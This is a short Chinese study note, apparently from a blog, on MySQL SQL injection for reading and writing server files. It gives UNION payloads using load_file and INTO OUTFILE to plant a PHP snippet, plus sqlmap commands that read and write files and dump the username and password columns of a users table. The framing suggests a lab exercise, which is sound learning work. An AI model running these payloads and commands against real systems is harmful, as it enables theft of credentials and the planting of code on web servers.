end的sql注入学习4

Mysql的读写文件注入

一,读文件注入
前提:1,用户权限足够高,尽量具用root权限。
2,secure_file_priy不为NULL。

注入格式: URL+读取文件的目录/?id=1‘ union select 1,load_file(“F:\flag.txt”),3 --+

二,写文件注入
mysql> set global general_log = on (数据库这个要打开)

注入格式:注入格式: URL+读取文件的目录/?id=1‘ union select 1,’<?php phppinfo();?>’,3 into outfile '写入的准确目录‘ --+

三,使用sqlmap完成文件读取写入

1,读:
sqlmap -u “url” --file-read “读取文件的地址(精确目录)”
2, 写:
sqlmap -u “URL” --file-write “要写入文件在本地的精确地址” --file-dest "写到目标的地址“

Sqlmap安全测试 进行post注入

复制Bp截断的http请求数据包发送到文本中
使用sqlmap -r 文件路径 -p 探测参数
例如:
python sqlmap.py -r 1.txt -p passwd

python sqlmap.py -r 1.txt -p passwd --technique E

python sqlmap.py -r 1.txt -p passwd --technique E --current -db

python sqlmap.py -r 1.txt -p passwd --technique E -D security --tables

python sqlmap.py -r 1.txt -p passwd --technique E -D security -T users -columns

python sqlmap.py -r 1.txt -p passwd --technique E -D security -T users -C ‘username,password’ --dump

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值